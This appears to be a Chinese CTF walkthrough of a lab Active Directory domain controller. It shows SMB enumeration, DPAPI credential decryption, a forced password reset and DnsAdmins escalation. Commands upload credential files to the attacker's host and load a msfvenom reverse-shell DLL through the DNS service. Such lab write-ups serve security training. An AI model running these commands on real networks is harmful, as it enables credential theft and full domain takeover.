信息收集

服务探测

❯ export ip=192.168.60.128
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.128:53
Open 192.168.60.128:88
Open 192.168.60.128:135
Open 192.168.60.128:139
Open 192.168.60.128:389
Open 192.168.60.128:445
Open 192.168.60.128:464
Open 192.168.60.128:593
Open 192.168.60.128:3268
Open 192.168.60.128:3389
Open 192.168.60.128:5985
Open 192.168.60.128:9389
Open 192.168.60.128:49664
Open 192.168.60.128:49669
Open 192.168.60.128:51774
Open 192.168.60.128:51775
Open 192.168.60.128:51792
Open 192.168.60.128:57684
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 14:05 CST
Initiating ARP Ping Scan at 14:05
Scanning 192.168.60.128 [1 port]
Completed ARP Ping Scan at 14:05, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:05
Completed Parallel DNS resolution of 1 host. at 14:05, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:05
Scanning 192.168.60.128 [18 ports]
Discovered open port 135/tcp on 192.168.60.128
Discovered open port 3389/tcp on 192.168.60.128
Discovered open port 53/tcp on 192.168.60.128
Discovered open port 445/tcp on 192.168.60.128
Discovered open port 57684/tcp on 192.168.60.128
Discovered open port 139/tcp on 192.168.60.128
Discovered open port 49664/tcp on 192.168.60.128
Discovered open port 389/tcp on 192.168.60.128
Discovered open port 51774/tcp on 192.168.60.128
Discovered open port 9389/tcp on 192.168.60.128
Discovered open port 3268/tcp on 192.168.60.128
Discovered open port 5985/tcp on 192.168.60.128
Discovered open port 88/tcp on 192.168.60.128
Discovered open port 593/tcp on 192.168.60.128
Discovered open port 51775/tcp on 192.168.60.128
Discovered open port 51792/tcp on 192.168.60.128
Discovered open port 49669/tcp on 192.168.60.128
Discovered open port 464/tcp on 192.168.60.128
Completed SYN Stealth Scan at 14:05, 0.02s elapsed (18 total ports)
Nmap scan report for 192.168.60.128
Host is up, received arp-response (0.00088s latency).
Scanned at 2025-08-26 14:05:33 CST for 0s

PORT      STATE SERVICE        REASON
53/tcp    open  domain         syn-ack ttl 128
88/tcp    open  kerberos-sec   syn-ack ttl 128
135/tcp   open  msrpc          syn-ack ttl 128
139/tcp   open  netbios-ssn    syn-ack ttl 128
389/tcp   open  ldap           syn-ack ttl 128
445/tcp   open  microsoft-ds   syn-ack ttl 128
464/tcp   open  kpasswd5       syn-ack ttl 128
593/tcp   open  http-rpc-epmap syn-ack ttl 128
3268/tcp  open  globalcatLDAP  syn-ack ttl 128
3389/tcp  open  ms-wbt-server  syn-ack ttl 128
5985/tcp  open  wsman          syn-ack ttl 128
9389/tcp  open  adws           syn-ack ttl 128
49664/tcp open  unknown        syn-ack ttl 128
49669/tcp open  unknown        syn-ack ttl 128
51774/tcp open  unknown        syn-ack ttl 128
51775/tcp open  unknown        syn-ack ttl 128
51792/tcp open  unknown        syn-ack ttl 128
57684/tcp open  unknown        syn-ack ttl 128
MAC Address: 00:0C:29:D4:9B:A5 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
           Raw packets sent: 19 (820B) | Rcvd: 19 (820B)

没有开放web服务，不过存在smb以及ldap常见的AD域环境中的服务

凭证泄露

探测匿名用户是否可以读取smb中的文件

❯ nxc smb $ip -u guest -p "" --shares
SMB         192.168.60.128  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:bicker.com) (signing:True) (SMBv1:False)
SMB         192.168.60.128  445    DC               [+] bicker.com\guest:
SMB         192.168.60.128  445    DC               [*] Enumerated shares
SMB         192.168.60.128  445    DC               Share           Permissions     Remark
SMB         192.168.60.128  445    DC               -----           -----------     ------
SMB         192.168.60.128  445    DC               ADMIN$                          远程管理
SMB         192.168.60.128  445    DC               C$                              默认共享
SMB         192.168.60.128  445    DC               IPC$            READ            远程 IPC
SMB         192.168.60.128  445    DC               NETLOGON                        Logon server share
SMB         192.168.60.128  445    DC               puppy           READ
SMB         192.168.60.128  445    DC               SYSVOL                          Logon server share

存在puppy文件夹可读，尝试下载文件夹中的图片

❯ smbclient  -U guest //$ip/puppy
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Aug 15 12:06:51 2025
  ..                                DHS        0  Fri Aug 15 17:20:46 2025
  puppy.jpg                           A    57634  Fri Aug 15 12:06:51 2025

                12923135 blocks of size 4096. 9336716 blocks available
smb: \> get puppy.jpg
getting file \puppy.jpg of size 57634 as puppy.jpg (3310.8 KiloBytes/sec) (average 3310.8 KiloBytes/sec)
smb: \> exit

查看图片是否存在隐写等加密

发现Artist存在uid字段

❯ file puppy.jpg
puppy.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 1200x1200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, description=bilibili, orientation=upper-left, software=Google], baseline, precision 8, 620x381, components 3
❯ exiftool puppy.jpg
ExifTool Version Number         : 13.10
File Name                       : puppy.jpg
Directory                       : .
File Size                       : 58 kB
File Modification Date/Time     : 2025:08:26 15:10:33+08:00
File Access Date/Time           : 2025:08:26 15:10:51+08:00
File Inode Change Date/Time     : 2025:08:26 15:10:33+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 1200
Y Resolution                    : 1200
Exif Byte Order                 : Little-endian (Intel, II)
Image Description               : bilibili
Orientation                     : Horizontal (normal)
Software                        : Google
Artist                          : uid=3546958956333518
Exif Version                    : 0220
Exif Image Width                : 620
Exif Image Height               : 381
Image Width                     : 620
Image Height                    : 381
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 620x381
Megapixels                      : 0.236

uid很明显是bilibili的用户id，直接搜索

闹麻了🤣，用户动态中存在置顶动态，里面泄露了用户凭证tindalos:Th3C@ll0fCtHu1hu!

验证凭证是否可用

❯ netexec ldap $ip -u tindalos -p 'Th3C@ll0fCtHu1hu!'
LDAP        192.168.60.128  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
LDAP        192.168.60.128  389    DC               [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu!
❯ netexec smb $ip -u tindalos -p 'Th3C@ll0fCtHu1hu!'
SMB         192.168.60.128  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:bicker.com) (signing:True) (SMBv1:False)
SMB         192.168.60.128  445    DC               [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu!
❯ netexec winrm $ip -u tindalos -p Th3C@ll0fCtHu1hu!
WINRM       192.168.60.128  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
WINRM       192.168.60.128  5985   DC               [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu! (Pwn3d!)

用户提权

此凭证可以直接通过winrm进行远程登录

❯ evil-winrm -i $ip -u 'tindalos' -p 'Th3C@ll0fCtHu1hu!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tindalos\Documents> whoami
bicker\tindalos
*Evil-WinRM* PS C:\Users\tindalos\Documents> gci ../Desktop


    目录: C:\Users\tindalos\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         8/15/2025   6:35 PM             26 user.txt


*Evil-WinRM* PS C:\Users\tindalos\Documents> gc ../Desktop/user.txt
user{f3a9d2b1c4e87a5f6d9b}

WinRM (Windows Remote Management) 是微软实现 WS-Management 协议的一种服务，它允许远程计算机管理通过 HTTP 或 HTTPS 进行通信。

默认情况下，WinRM 使用以下端口：

HTTP (非加密): 5985

HTTPS (加密): 5986

查看用户所属权限

*Evil-WinRM* PS C:\Users\tindalos\Documents> whoami /priv

特权信息
----------------------

特权名                        描述             状态
============================= ================ ======
SeMachineAccountPrivilege     将工作站添加到域 已启用
SeChangeNotifyPrivilege       绕过遍历检查     已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集   已启用

传个winpeas.bat上去，跑一遍

不知道为啥certutil没法成功下载😅，寄了，windows defender杀毒给杀了

*Evil-WinRM* PS C:\Users\tindalos\Documents> certutil -urlcache -split -f http://192.168.60.100/winPEAS.bat C:\Users\tindalos\Documents\winpeas.bat
Program 'certutil.exe' failed to run: 拒绝访问。At line:1 char:1
+ certutil -urlcache -split -f http://192.168.60.100/winpeas.bat C:\Use ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ certutil -urlcache -split -f http://192.168.60.100/winpeas.bat C:\Use ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\tindalos\Documents> Invoke-WebRequest -Uri http://192.168.60.100/winPEAS.bat -OutFile "C:\Users\tindalos\Documents\winpeas.bat"
*Evil-WinRM* PS C:\Users\tindalos\Documents> gci


    目录: C:\Users\tindalos\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         8/26/2025   4:21 PM          36950 winpeas.bat

PS C:\Users\tindalos\Documents> .\winpeas.bat
Program 'winpeas.bat' failed to run: 无法成功完成操作，因为文件包含病毒或潜在的垃圾软件。At line:1 char:1
+ .\winpeas.bat
+ ~~~~~~~~~~~~~.
At line:1 char:1
+ .\winpeas.bat
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

DNSADMIN提权

查看所属用户组

发现tindalos是dnsadmin组成员，这个组不太寻常

*Evil-WinRM* PS C:\Users\tindalos\Documents> whoami /groups

组信息
-----------------

组名                                        类型   SID                                          属性
=========================================== ====== ============================================ ======================================
Everyone                                    已知组 S-1-1-0                                      必需的组, 启用于默认, 启用的组
BUILTIN\Remote Desktop Users                别名   S-1-5-32-555                                 必需的组, 启用于默认, 启用的组
BUILTIN\Remote Management Users             别名   S-1-5-32-580                                 必需的组, 启用于默认, 启用的组
BUILTIN\Users                               别名   S-1-5-32-545                                 必需的组, 启用于默认, 启用的组
BUILTIN\Pre-Windows 2000 Compatible Access  别名   S-1-5-32-554                                 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NETWORK                        已知组 S-1-5-2                                      必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users            已知组 S-1-5-11                                     必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization              已知组 S-1-5-15                                     必需的组, 启用于默认, 启用的组
BICKER\DnsAdmins                            别名   S-1-5-21-298176814-2846777796-698167141-1101 必需的组, 启用于默认, 启用的组, 本地组
NT AUTHORITY\NTLM Authentication            已知组 S-1-5-64-10                                  必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Plus Mandatory Level 标签   S-1-16-8448

通过查阅巨硬官方文档，发现dnsadmin组是不太安全的，可以尝试提权

安全评估：DnsAdmins 组的不安全权限 - Microsoft Defender for Identity | Microsoft Learn

实现最低权限管理模型 |Microsoft 学习

具体dnscmd命令的参数可以参考官方文档Dnscmd |Microsoft 学习

根据网上的文章可以得知，生成恶意的dll文件，重启dns服务后会利用此dll文件新注册一个位置，即可获得system权限

不过当前用户无法重启dns服务，甚至都无法查看dns服务状态

*Evil-WinRM* PS C:\Users\tindalos\Documents> stsv dns
The term 'stsv' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ stsv dns
+ ~~~~
    + CategoryInfo          : ObjectNotFound: (stsv:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\tindalos\Documents> gsv dns
Cannot find any service with service name 'dns'.
At line:1 char:1
+ gsv dns
+ ~~~~~~~
    + CategoryInfo          : ObjectNotFound: (dns:String) [Get-Service], ServiceCommandException
    + FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand

默认情况下，DNSAdmins 组的成员是无法直接（或被阻止）重启 DNS 服务的。

DNSAdmins 组的权限主要集中在配置和管理 DNS 服务本身，例如：

创建、修改、删除 DNS 区域

添加、修改、删除 DNS 记录

配置转发器、根提示

管理 DNS 安全设置 (如安全动态更新)

查看 DNS 服务状态和日志

所以我们需要一个拥有重启dns服务权限的用户

尝试利用netexec抓一下bloodhound域控信息

❯ netexec ldap $ip -u tindalos -p 'Th3C@ll0fCtHu1hu!' --bloodhound -c All -d bicker.com --dns-server $ip
LDAP        192.168.60.128  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
LDAP        192.168.60.128  389    DC               [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu!
LDAP        192.168.60.128  389    DC               Resolved collection methods: localadmin, session, trusts, rdp, objectprops, psremote, acl, container, dcom, group
LDAP        192.168.60.128  389    DC               Done in 00M 00S
LDAP        192.168.60.128  389    DC               Compressing output into /home/Pepster/.nxc/logs/DC_192.168.60.128_2025-08-26_172043_bloodhound.zip

导入zip包后，发现存在一个DNSRESTARTERS组，顾名思义是dns重启组，不过这些组名是可以自定义的，描述中也写明了允许通过计划任务/脚本重新启动 DNS 的组

假定此组存在dns重启权限，进一步查看得知Lihua用户隶属于ACCOUNTMODIFIER此组可以强制修改JIANYIN用户的密码

*Evil-WinRM* PS C:\Users\tindalos\Documents> net user lihua /domain
用户名                 lihua
全名
注释
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2025/8/15 18:24:10
密码到期               2025/9/26 18:24:10
密码可更改             2025/8/16 18:24:10
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           dc
登录脚本
用户配置文件
主目录
上次登录               从不

可允许的登录小时数     All

本地组成员             *Remote Management Use
全局组成员             *Domain Users         *AccountModifier
命令成功完成。

*Evil-WinRM* PS C:\Users\tindalos\Documents> net user jianyin /domain
用户名                 jianyin
全名
注释
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2025/8/15 9:05:36
密码到期               2025/9/26 9:05:36
密码可更改             2025/8/16 9:05:36
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               从不

可允许的登录小时数     All

本地组成员             *Remote Management Use
全局组成员             *Domain Users         *DNSRestarters
命令成功完成。

DPAPI解密

通过Dpapi获取Windows身份凭证 | 长亭百川云

尝试解密DPAPI获取保存的历史凭证信息

猜测lihua用户的凭证是被保存过的，由于我们已知tindalos的明文密码，所以可以解密其DPAPI主密钥Master Key

一般域控环境中的主密钥路径位于%APPDATA%\Roaming\Microsoft\Protect\<User_SID>也就是漫游配置文件的一部分，而local是本机凭证保存

得到SID为S-1-5-21-298176814-2846777796-698167141-1103

凭证文件夹为A2E4656BCBABFD9279E090E8482A7141

注意Credentials路径下的文件默认是隐藏的，所以需要使用ls -force或者gci -hidden才可以看到

*Evil-WinRM* PS C:\Users\tindalos\Documents> gci C:\Users\tindalos\AppData\Roaming\Microsoft\Protect


    目录: C:\Users\tindalos\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         8/15/2025   6:11 PM                S-1-5-21-298176814-2846777796-698167141-1103

*Evil-WinRM* PS C:\Users\tindalos\Documents> gci -hidden C:\Users\tindalos\AppData\Roaming\Microsoft\Credentials


    目录: C:\Users\tindalos\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         8/15/2025   6:26 PM            326 A2E4656BCBABFD9279E090E8482A7141

DPAPI (Data Protection Application Programming Interface) 是 Windows 操作系统提供的一种数据保护机制，用于加密敏感数据，使得这些数据只能由加密它们的用户或计算机进行解密。它的主要优点是，应用程序不需要自己管理加密密钥，而是依赖 Windows 提供的安全存储。

用户密码的哈希派生值（用户级 DPAPI）： 如果攻击者知道用户的明文密码或其 NT 哈希值，就可以重新生成用于解密主密钥的密钥。

机器帐户的密钥（域和机器级 DPAPI）： 需要访问机器帐户密钥，通常存储在域控制器中的 Active Directory 数据库 (NTDS.DIT) 中，或者通过 Mimikatz 从内存中获取。

路径类型	实际路径示例	存储内容	解密关键
DPAPI 主密钥	`C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>`	用户 DPAPI 主密钥文件。这些密钥本身被用户的登录凭据（密码哈希派生密钥）加密。	用户的明文密码或 NT 哈希 (用于解密主密钥文件)
加密凭据	`C:\Users\<user>\AppData\Local\Microsoft\Credentials\`	被加密的实际凭据数据 (例如：Windows 凭据管理器保存的各种密码、域密码缓存、Web 凭据等)，它们由 DPAPI 主密钥加密。	对应的 DPAPI 主密钥 (必须已解密)。一旦主密钥解密，这些凭据数据就可以被解密。

进入SID文件夹，解密其中的主密钥

*Evil-WinRM* PS C:\Users\tindalos\Documents> ls -force C:\Users\tindalos\AppData\Roaming\Microsoft\Protect\S-1-5-21-298176814-2846777796-698167141-1103


    目录: C:\Users\tindalos\AppData\Roaming\Microsoft\Protect\S-1-5-21-298176814-2846777796-698167141-1103


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         8/15/2025  11:18 AM            900 BK-BICKER
-a-hs-         8/15/2025   6:11 PM            740 cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74
-a-hs-         8/15/2025   6:11 PM             24 Preferred

Evil-WinRM下载有点问题，使用python反向上传脚本，wackymaker师傅的脚本

#!/usr/bin/env python3
#curl -F "file=@/home/app/app/instance/users.db" http://10.10.16.6/
from http.server import HTTPServer, BaseHTTPRequestHandler
import cgi
import os
import io

PORT = 80
UPLOAD_DIR = "./uploads"

if not os.path.exists(UPLOAD_DIR):
    os.makedirs(UPLOAD_DIR)

class SimpleUploadHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        html = '''
        <html><body>
        <h1>Upload file</h1>
        <form enctype="multipart/form-data" method="post">
          <input name="file" type="file"/>
          <input type="submit" value="Upload"/>
        </form>
        </body></html>
        '''
        self.wfile.write(html.encode('utf-8'))

    def do_POST(self):
        content_type = self.headers.get('content-type')
        if not content_type:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"No Content-Type header")
            return

        ctype, pdict = cgi.parse_header(content_type)
        if ctype != 'multipart/form-data':
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"Content-Type is not multipart/form-data")
            return

        length = int(self.headers.get('content-length'))
        post_data = self.rfile.read(length)  # 读取POST全部数据

        # 用BytesIO包裹post_data以支持FieldStorage读取
        post_io = io.BytesIO(post_data)

        form = cgi.FieldStorage(
            fp=post_io,
            headers=self.headers,
            environ={
                'REQUEST_METHOD': 'POST',
                'CONTENT_TYPE': content_type,
            }
        )

        if 'file' not in form:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"No file field in form")
            return

        file_item = form['file']
        if not file_item.filename:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"No filename provided")
            return

        filename = os.path.basename(file_item.filename)
        file_data = file_item.file.read()

        filepath = os.path.join(UPLOAD_DIR, filename)
        with open(filepath, 'wb') as f:
            f.write(file_data)

        self.send_response(200)
        self.end_headers()
        self.wfile.write(f"File '{filename}' uploaded successfully\n".encode())

def run():
    server_address = ('', PORT)
    httpd = HTTPServer(server_address, SimpleUploadHandler)
    print(f"Starting server on port {PORT}, saving uploads to {UPLOAD_DIR}")
    httpd.serve_forever()

if __name__ == "__main__":
    run()

启动服务，尝试上传文件

❯ python3 upload_server.py
Starting server on port 80, saving uploads to ./uploads
192.168.60.128 - - [26/Aug/2025 23:58:04] "POST / HTTP/1.1" 200 -
192.168.60.128 - - [26/Aug/2025 23:59:48] "POST / HTTP/1.1" 200 -

--------------------
*Evil-WinRM* PS C:\Users\tindalos\Documents> $wc = New-Object System.Net.WebClient
*Evil-WinRM* PS C:\Users\tindalos\Documents> $wc.UploadFile("http://192.168.60.100/", "POST", "C:\Users\tindalos\AppData\Roaming\Microsoft\Protect\S-1-5-21-298176814-2846777796-698167141-1103\cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74")
*Evil-WinRM* PS C:\Users\tindalos\Documents> $wc.UploadFile("http://192.168.60.100/", "POST", "C:\Users\tindalos\AppData\Roaming\Microsoft\Credentials\A2E4656BCBABFD9279E090E8482A7141")

尝试利用tindalos明文密码解密DPAPI

❯ cd uploads
❯ ls
A2E4656BCBABFD9279E090E8482A7141  cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74
❯ impacket-dpapi masterkey -file cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74 -sid S-1-5-21-298176814-2846777796-698167141-1103 -password 'Th3C@ll0fCtHu1hu!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0x0ff22e711e14912c168ec3943e2478081930413b24795f45028bf15992aebc0b5b0954128398441a4c2578c90e5c2da71bc678d8d5a4e66836e9f083e20eeb27

再利用解密出来的masterkey解密凭证

得到lihua用户保存凭证的密码hello%2633

❯ impacket-dpapi credential -file A2E4656BCBABFD9279E090E8482A7141 -key 0x0ff22e711e14912c168ec3943e2478081930413b24795f45028bf15992aebc0b5b0954128398441a4c2578c90e5c2da71bc678d8d5a4e66836e9f083e20eeb27
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-08-15 10:26:22
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=LOCALMACHINE
Description :
Unknown     :
Username    : lihua
Unknown     : hello%2633

其实这里有个小彩蛋，就是Powershell的历史记录没清除，可以看到作者设置的源密码，不过没啥用

*Evil-WinRM* PS C:\Users\tindalos\Documents> (Get-PSReadlineOption)


EditMode                               : Windows
AddToHistoryHandler                    : System.Func`2[System.String,System.Object]
HistoryNoDuplicates                    : True
HistorySavePath                        : C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ServerRemoteHost_history.txt
HistorySaveStyle                       : SaveIncrementally
HistorySearchCaseSensitive             : False
HistorySearchCursorMovesToEnd          : False
MaximumHistoryCount                    : 4096
ContinuationPrompt                     : >>
ExtraPromptLineCount                   : 0
PromptText                             :
BellStyle                              : Audible
DingDuration                           : 50
DingTone                               : 1221
CommandsToValidateScriptBlockArguments : {ForEach-Object, %, Invoke-Command, icm...}
CommandValidationHandler               :
CompletionQueryItems                   : 100
MaximumKillRingCount                   : 10
ShowToolTips                           : True
ViModeIndicator                        : None
WordDelimiters                         : ;:,.[]{}()/\|^&*-=+'"–—―
AnsiEscapeTimeout                      : 100
CommandColor                           : "$([char]0x1b)[93m"
CommentColor                           : "$([char]0x1b)[32m"
ContinuationPromptColor                : "$([char]0x1b)[37m"
DefaultTokenColor                      : "$([char]0x1b)[37m"
EmphasisColor                          : "$([char]0x1b)[96m"
ErrorColor                             : "$([char]0x1b)[91m"
KeywordColor                           : "$([char]0x1b)[92m"
MemberColor                            : "$([char]0x1b)[97m"
NumberColor                            : "$([char]0x1b)[97m"
OperatorColor                          : "$([char]0x1b)[90m"
ParameterColor                         : "$([char]0x1b)[90m"
SelectionColor                         : "$([char]0x1b)[30;47m"
StringColor                            : "$([char]0x1b)[36m"
TypeColor                              : "$([char]0x1b)[37m"
VariableColor                          : "$([char]0x1b)[92m"



*Evil-WinRM* PS C:\Users\tindalos\Documents> ls C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


    Directory: C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         8/15/2025   6:22 PM            160 ConsoleHost_history.txt


*Evil-WinRM* PS C:\Users\tindalos\Documents> cat C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$pass = 'fhkjds%&12'
$pass = 'fhkjds%&12'
cmd
$pass = 'fhkjds%&12'
cmd
$Cred = New-Object System.Management.Automation.PSCredential('lihua', $SecurePass)

System提权

验证密码是否有效，不知道为什么这里netexec显示不能登录winrm，实际上是可以通过evil-winrm登录的

❯ netexec ldap $ip -u lihua -p 'hello%2633'
LDAP        192.168.60.128  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
LDAP        192.168.60.128  389    DC               [+] bicker.com\lihua:hello%2633
❯ netexec winrm $ip -u lihua -p 'hello%2633'
WINRM       192.168.60.128  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
WINRM       192.168.60.128  5985   DC               [-] bicker.com\lihua:hello%2633
❯ netexec smb $ip -u lihua -p 'hello%2633'
SMB         192.168.60.128  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:bicker.com) (signing:True) (SMBv1:False)
SMB         192.168.60.128  445    DC               [+] bicker.com\lihua:hello%2633

强制修改jianyin用户的密码

❯ pip install bloodyAD
❯ bloodyAD -u lihua -p hello%2633 --host $ip -d bicker.com set password "jianyin" "P@ssw0rd123"
[+] Password changed successfully!
❯ netexec winrm $ip -u jianyin -p 'P@ssw0rd123'
WINRM       192.168.60.128  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
WINRM       192.168.60.128  5985   DC               [+] bicker.com\jianyin:P@ssw0rd123 (Pwn3d!)

DNS服务重启

生成一个反弹shell的恶意dll文件

❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.60.100 LPORT=4444 -f dll -o rev.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: rev.dll

evil-winrm连接到tindalos用户，上传文件到靶机

1	Evil-WinRM PS C:\Users\tindalos\Documents> wget http://192.168.60.100/rev.dll -outFile C:\Users\tindalos\Documents\rev.dll

根据官方文档指定dns插件路径

*Evil-WinRM* PS C:\Users\tindalos\Documents> dnscmd /config /serverlevelplugindll C:\Users\tindalos\Documents\rev.dll

注册属性 serverlevelplugindll 成功重置。
命令成功完成。

回到jianyin用户，查看dns服务状态，尝试重启启动服务

*Evil-WinRM* PS C:\Users\jianyin\Documents> gsv dns

Status   Name               DisplayName
------   ----               -----------
Running  dns                DNS Server


*Evil-WinRM* PS C:\Users\jianyin\Documents> spsv dns
*Evil-WinRM* PS C:\Users\jianyin\Documents> start-service dns

监听端口

❯ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from bicker.com [192.168.60.128] 57084
Microsoft Windows [汾 10.0.20348.169]
(c) Microsoft Corporation

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
root{7c1e4b8a2d6f3b9c5e0a}

其实还有另一种比较快的方案，直接跳过DPAPI获取lihua用户凭证以及修改jianyin密码

在tindalos设置完dns的插件dll后，直接重启靶机即可触发恶意的dll，达到反弹shell的目的😂

DNSADMIN热重载

qiaojojo有个非预期解😂

参考DnsAdmins 再次回顾 - Semperis — DnsAdmins Revisited - Semperis

基于DnsAdmin组的dns热重载权限维持及衍生情况

即使当前用户不具备重启dns服务的权限，也可以利用dnscmd.exe进行重启

*Evil-WinRM* PS C:\Users\tindalos\Documents> dnscmd /config /serverlevelplugindll C:\Users\tindalos\Documents\rev.dll

注册属性 serverlevelplugindll 成功重置。
命令成功完成。

*Evil-WinRM* PS C:\Users\tindalos\Documents> dnscmd 127.0.0.1 /restart

127.0.0.1 已成功完成。
命令成功完成。

这里显示执行成功，但不会立即收到反弹shell

需要等一会，才能拿到shell

❯ nc -lvp 4444
listening on [any] 4444 ...
192.168.60.128: inverse host lookup failed: Unknown host
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.128] 51624
Microsoft Windows [汾 10.0.20348.169]
(c) Microsoft Corporation

C:\Windows\system32>whoami
